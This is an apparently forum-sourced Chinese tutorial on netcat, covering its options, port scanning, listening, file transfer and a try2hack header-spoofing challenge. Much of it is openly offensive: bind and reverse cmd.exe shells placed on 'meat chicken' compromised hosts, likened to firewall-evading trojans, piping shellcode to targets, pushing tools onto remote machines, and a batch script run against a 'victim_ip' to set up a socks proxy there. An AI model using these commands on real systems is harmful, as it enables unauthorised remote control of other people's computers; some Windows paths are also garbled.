NC的用法

netcat被誉为网络安全界的‘瑞士军刀’，相信没有什么人不认识它吧......
一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。 

下载：

http://download.csdn.net/detail/asli33/3903677

在中国，它的WINDOWS版有两个版本，一个是原创者Chris Wysopal写的原版本，另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB（10多KB的NC是不能完成下面所说的第4、第5种使用方法，有此功能的原版NC好象要60KB：P），虽然“体积”小，但很完成很多工作。 

参数介绍：

nc.exe -h即可看到各参数的使用方法。
基本格式：nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]

-d 后台模式
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时

端口的表示方法可写为M-N的范围格式。


基本用法：

大概有以下几种用法：

1)连接到REMOTE主机，例子：
格式：nc -nvv 192.168.x.x 80
讲解：连到192.168.x.x的TCP80端口


2)监听LOCAL主机，例子：
格式：nc -l -p 80
讲解：监听本机的TCP80端口


3)扫描远程主机，例子：
格式：nc -nvv -w2 -z 192.168.x.x 80-445
讲解：扫描192.168.x.x的TCP80到TCP445的所有端口


4)REMOTE主机绑定SHELL，例子：
格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口


5)REMOTE主机绑定SHELL并反向连接，例子：
格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口


以上为最基本的几种用法（其实NC的用法还有很多，
当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......）。

高级用法：

6)作攻击程序用，例子：
格式1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80 < c:exploit.txt
讲解：连接到192.168.x.x的80端口，并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果，真是有异曲同工之妙:P)

附：c:exploit.txt为shellcode等


7)作蜜罐用[1]，例子：
格式：nc -L -p 80
讲解：使用-L(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止.


8)作蜜罐用[2]，例子：
格式：nc -L -p 80 > c:log.txt
讲解：使用-L可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到c:log.txt中，如果把‘>’改为‘>>’即可以追加日志。

附：c:log.txt为日志等


9)作蜜罐用[3]，例子：
格式1：nc -L -p 80 < c:honeypot.txt
格式2：type.exe c:honeypot.txt|nc -L -p 80
讲解：使用-L可以不停地监听某一个端口，直到ctrl+c为止，并把c:honeypot.txt的内容‘送’入其管道中。

 

NC使用教程 

在黑客界混如果不知道什么叫NC的话，那可真是白混了 
今天教大家如何来使用NC 

讲四个命令

命令1：监听命令 

nc -l -p port 
nc -l -p port > e:\log.dat 
nc -l -v -p port 

参数解释： 

-l：监听端口，监听入站信息 
-p：后跟本地端口号 
-v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息 

提示：一般大家都爱用-vv 

nc -l -p 80 

这个很简单，监听80端口 
如果机器上运行这个命令，端口80被认为是开放的，可以欺骗很多扫描器的哦！ 

nc -l -p 80 > e:\log.dat 

呵呵，功能和上边一样，但是后边加了个“> e:\log.dat”我想，学过ECHO那个命令的人都会知道吧，是在E盘创建一个log.dat的日志文件 

nc -l -v -p 80 

和上边命令相似，不过这次不是记录在文件里，而是会直接显示在运行着NC的屏幕上。 

呵呵，讲了这么多，来实践下 

nc -l -v -p 80 

然后在浏览器中输入本机IP：127.0.0.1 
呵呵，看到什么？ 

同样，上边两个也是一样，大家自己试验一下吧

139要加参数-s（nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP）
这样就可以保证nc.exe优先于NETBIOS。

命令2：程序定向 

nc -l -p port -t -e cmd.exe 

本地机： nc -l -p port 或 nc -l -v -p port 
目标机：nc -e cmd.exe ip port 

参数解释： 

-l、-p两个参数已经解释过了 
-e；作用就是程序定向 
-t：以telnet的形式来应答 

例子 

nc -l -p 5277 -t -e cmd.exe 

知道运行在哪里吗？千万不要运行在自己的机器上，如果运行了，你机器就会变成一台TELNET的服务器了，呵呵，解释一下：监听本地端口5277的入站信息，同时将CMD.exe这个程序，重定向到端口5277上，当有人连接的时候，就让程序CMD.exe以TELNET的形式来响应连接要求。 

说白了，其实就是让他成为一台TELNET的肉鸡，所以这个命令要运行在你的肉鸡上。

呵呵，咱们来找台肉鸡试试，我TELNET IP 5277 
HOHO~~如何？ 

local machine：nc -l -p port ( or nc -l -v -p port ) 
remote machine：nc -e cmd.exe ip port 

大家知道灰鸽子和神偷吧，这两款工具都是利用了反弹端口型的木马， 
什么叫反弹端口？就是说，当对方中马后，不用你主动和对方连接，也就是说不用从你的client端向对方主机上运行的server端发送请求连接，而是对方主动来连接你这样就可以使很多防火墙失效，因为很多防火墙都不检查出站请求的。 


这里这两个命令结合在一起后，于那两款木马可以说有异曲同工之效。

nc -l -p 5277 （监听本地5277端口） 

同样也可以用 

nc -l -v -p 5277 

运行在本地然后在远程机器上，想办法运行 

nc -e cmd.exe ip 5277 

（你可别真的打“ip”在肉机上啊）要打，xxx.xxx.xxx.xxx这样！！ 

呵呵，看看在本地机器上出现了什么？ 

这样就是反弹~~在本地机器上得到了一个SHELL

命令3：扫描端口 

nc -v ip port 
nc -v -z ip port-port 
nc -v -z -u ip port-port 


参数解释： 

-z：将输入输出关掉，在扫描时使用 

nc -v ip port 

这个命令是针对某一个端口进行扫描 

例如： 

nc -v ip 135 

扫描远程主机的135端口，这样获得了该端口的一些简单信息，但是针对某些端口，我们还可以获得更多的信息 

例如：80端口 

我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息 

nc -v -z ip port-port 

这个命令是用来扫描的一个命令，这个命令用于快速扫描TCP端口，而port-port则是指定了扫描的端口范围 

例如： 

nc -v -z ip 1-200 

可以看到我机器上的1-200的TCP端口的开放情况 


nc -v -z -u ip port-port 

这个命令比上个命令多了个-u，这个命令的作用仍然是扫描端口，只是多了一个-u的参数，是用来扫UDP端口的 

例如： 

nc -v -z -u ip 1-200 

这个命令就会扫1-200的UDP端口

命令4：传送文件（HOHO，I LIKE） 

LOCAL MACHINE：nc -v -n ip port < x:\svr.exe 
REMOTE MACHINE：nc -v -l -p port > y:\svr.exe 

参数解释： 

-n：指定数字的IP地址 

这两个命令结合起来是用来传送文件的 

首先，在远程机上运行命令： 

nc -v -l -p 5277 > c:\pulist.exe 

这个命令还记的吗？呵呵，是不是和监听命令有点类似，对，没错，这个是监听5277端口并把接受到的信息数据写到c:\pulist.exe中.这时候在本地机上运行 

nc -v -n ip 5277 < e:\hack\pulist.exe 

这个命令的意思就是，从本地E盘跟目录中读取pulist.exe文件的内容，并把这些数据发送到ip的5277端口上.这样远程主机就会自动创建一个pulist.exe文件。

IE的MIME欺骗 

www.try2hack..nl(是一个让初学黑客技术的人去做实验的站点)
打开这个页面，有http://www.try2hack.nl/cgi-bin/level7.pl页面（这个网站提供了黑客的8关，过了这8关证明你开始入门了），这个页面告诉我们的浏览器不是 IE6.72,我们的操作系统不是LIUNX,我们不是从www.microsoft.com/ms.htm重定向链接过去的，有病阿（这是一个题目呀，要慢慢研究），linux有IE6.72? 微软会在它的页面上放http://www.try2hack.nl/cgi-bin/level7.pl的链接？看看页面的源代码，level7.pl是在服务器端 执行的perl脚本，根本无法看到，还是研究一下IE5和它通信时都告诉了它什么，抓包，我们会发现，我们的IE5告诉对方：我是MSIE 5.0; Windows NT 5.0; .NET CLR1.0.3705。。。。哈哈，level7.pl这个cgi应该是根据这些信息知道我们不是它要求的客户，嘿嘿，需要欺骗对方才行，用军刀来可以实现，如下做就可以哄对方了：
nc www.try2hack.nl 80 【enter】
GET /cgi-bin/level7.pl HTTP/1.1 【enter】
Accept: image/gif, image/x-xbitmap, application/msword, */* 【enter】
Refererhttp://www.microsoft.com/ms.htm 【enter】
Accept-Language: zh-cn 【enter】
Accept-Encoding: gzip, deflate 【enter】
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; Linux 8.8.8 i986) 【enter】
Host: www.try2hack.nl 【enter】
Connection:
Keep-Alive 【enter】
注意，如果出现HTTP 400时，说明你输入格式有问题，出现httpd 200回应时，就给出结果了：

telnet,自动批处理。 

nc victim_ip port < pathfile.cmd 　 /*victim machine*/ 显示执行过程.
nc -vv victim_ip port < pathfile.cmd 　 /*victim machine*/ 显示执行过程.

nc -d victim_ip port < pathfile.cmd 安静模式.

_______________file.cmd________________________
password
cd %windir%
echo 【】=【%windir%】
c:
cd
md test
cd /d %windir%system32
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__END___________________

上边是NC的比较常用的方法，希望通过这些，大家能发挥自己的想象力，创造出更多更精彩的命令来，因为NC的用法不仅仅局限于这几种而已哦！！对NC来说，只有想不到，没有做不到的！！！